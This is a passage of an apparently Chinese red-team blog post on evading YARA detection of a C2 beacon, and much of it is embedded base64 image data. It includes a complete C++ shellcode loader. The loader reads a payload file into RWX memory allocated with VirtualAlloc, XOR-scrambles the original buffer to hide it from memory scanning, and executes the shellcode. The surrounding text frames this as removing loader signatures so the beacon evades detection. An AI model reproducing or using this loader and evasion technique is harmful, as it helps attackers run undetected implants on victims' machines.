66MJcp0xtiPDfUl2UmDSWYyDkAJJ2UIDADEHKMZZsbhVO7q+NjBUvGQjIwbGkZR9FdxrT0WWoyCpH/j0y0AC9CzXapJlBGAspZIcApzTItqizFf8ggAYEjF1oAF6dfbzMzaGZ9UvMMWS9U0W6vNqXDYTUizlqblGACWrGm+Q7NoljiLb+GigeXilLZcri3JWJ+U3pASdcmX/sNiKQySErUsZmgBLk0/GpvUQkHgm0uK5RhPF8eg+GxwHL61EwWUKoEZr+PUCc3ZIAv/9+zTLOXibqLhpGUutmwq68m6QfPup1I6/f66ccDJdMj8UWeeHwmRMx26d9DHgSp4t37A7KvpwDJo2KMtx+dxOgkAwlebXV8xWi91vzjBipD5Hpg281ZuBaVWLBWV8eDPPh6ybCGhq6+jYz9699EJTTgNe3U1P/4ljqSyn+2YJ9F6cmqkLrudy0hx7N2NFyS/rxjBT0rMpQBYdFLR16iodAzLDzo8Z8GBsPb7nu3or0VYNLDlQVAuvVQqWIJW5WZO69b0NcLJxDub194pDDfJ+JtrXG8CbjH+0mO3tt+801FLzzVXLq1vKJBKubQVq4/evspZP8dr6+TFZ2Ps3a6ent6AYd6/f5sdfnkAACAP/2fS3LDxtzb1LXi59vd/LPae+MOebWikiUEBrW8oW6OKrIBAIBAIBAKBUAFVI2RrdqvVHI6kNLDKeCHT7cmobB5VEiRnNCUquyp+KEgMJgtPC6MUznVgkTqWW7Sw0UJGKsZJwoAoELaRUwBYOF83HAcSNB9oMAbmSJkSYWuZUYyM7mqUgnpTgLOjWRSQpCa
</p>
<p>yara检测使用自定义算法的beacon，最后只剩一条特征了</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>在内存中默认算法和自定义加密算法的对比</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<h4 id=0x0316-加载器特征去除>
 0x0316 加载器特征去除
 <a class=heading-link href=#0x0316-%e5%8a%a0%e8%bd%bd%e5%99%a8%e7%89%b9%e5%be%81%e5%8e%bb%e9%99%a4>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h4>
<h5 id=0x03161-shellcode-loader>
 0x03161 shellcode loader
 <a class=heading-link href=#0x03161-shellcode-loader>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h5>
<p>最后的这个特征，其实是生成exe时附带的。如果使用shellcode loader进行上线这一个部分就不需要更改了</p>
<p>不过使用shellcode loader要注意需要对存放shellcode的内存进行加密或者清理，非常简单的代码，主要是为了演示</p>
<div class=highlight><pre tabindex=0 style=color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c++ data-lang=c++><span style=display:flex><span><span style=color:#8b949e;font-weight:bold;font-style:italic>#include&lt;iostream&gt;
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-weight:bold;font-style:italic>#include&lt;windows.h&gt;
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-weight:bold;font-style:italic>#include&lt;fstream&gt;
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-weight:bold;font-style:italic></span>
</span></span><span style=display:flex><span><span style=color:#ff7b72>using</span> <span style=color:#ff7b72>namespace</span> std;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#ff7b72>int</span> <span style=color:#d2a8ff;font-weight:bold>main</span>()
</span></span><span style=display:flex><span>{
</span></span><span style=display:flex><span>    <span style=color:#8b949e;font-style:italic>// shellcode raw 
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-style:italic></span>	<span style=color:#ff7b72>char</span> filePath[] <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#a5d6ff>"./payload_x64.bin"</span>;
</span></span><span style=display:flex><span>	ifstream file(filePath, ios<span style=color:#ff7b72;font-weight:bold>::</span>binary <span style=color:#ff7b72;font-weight:bold>|</span> ios<span style=color:#ff7b72;font-weight:bold>::</span>ate);
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>if</span> (<span style=color:#ff7b72;font-weight:bold>!</span>file) {
</span></span><span style=display:flex><span>		<span style=color:#ff7b72>return</span> <span style=color:#ff7b72;font-weight:bold>-</span><span style=color:#a5d6ff>1</span>;
</span></span><span style=display:flex><span>	}
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>int</span> fileSize <span style=color:#ff7b72;font-weight:bold>=</span> file.tellg();
</span></span><span style=display:flex><span>	file.seekg(<span style=color:#a5d6ff>0</span>, ios<span style=color:#ff7b72;font-weight:bold>::</span>beg);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>char</span><span style=color:#ff7b72;font-weight:bold>*</span> buffer <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#ff7b72>new</span> <span style=color:#ff7b72>char</span>[fileSize];
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>if</span> (<span style=color:#ff7b72;font-weight:bold>!</span>file.read(buffer, fileSize))
</span></span><span style=display:flex><span>	{
</span></span><span style=display:flex><span>		<span style=color:#ff7b72>return</span> <span style=color:#ff7b72;font-weight:bold>-</span><span style=color:#a5d6ff>2</span>;
</span></span><span style=display:flex><span>	}
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>void</span><span style=color:#ff7b72;font-weight:bold>*</span> exec <span style=color:#ff7b72;font-weight:bold>=</span> VirtualAlloc(<span style=color:#a5d6ff>0</span>, fileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
</span></span><span style=display:flex><span>	memcpy(exec, buffer, fileSize);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>    <span style=color:#8b949e;font-style:italic>// 对buffer进行加密
</span></span></span><span style=display:flex><span><span style=color:#8b949e;font-style:italic></span>	string key <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#a5d6ff>"cf81d743beef8422"</span>;
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>for</span> (<span style=color:#ff7b72>int</span> i <span style=color:#ff7b72;font-weight:bold>=</span> <span style=color:#a5d6ff>0</span>; i <span style=color:#ff7b72;font-weight:bold>&lt;</span> fileSize; i<span style=color:#ff7b72;font-weight:bold>++</span>)
</span></span><span style=display:flex><span>	{
</span></span><span style=display:flex><span>		buffer[i] <span style=color:#ff7b72;font-weight:bold>=</span> buffer[i] <span style=color:#ff7b72;font-weight:bold>^</span> key[i <span style=color:#ff7b72;font-weight:bold>%</span> key.length()];
</span></span><span style=display:flex><span>	}
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	((<span style=color:#ff7b72>void</span>(<span style=color:#ff7b72;font-weight:bold>*</span>)())exec)();
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#ff7b72>return</span> <span style=color:#a5d6ff>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>效果如下</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
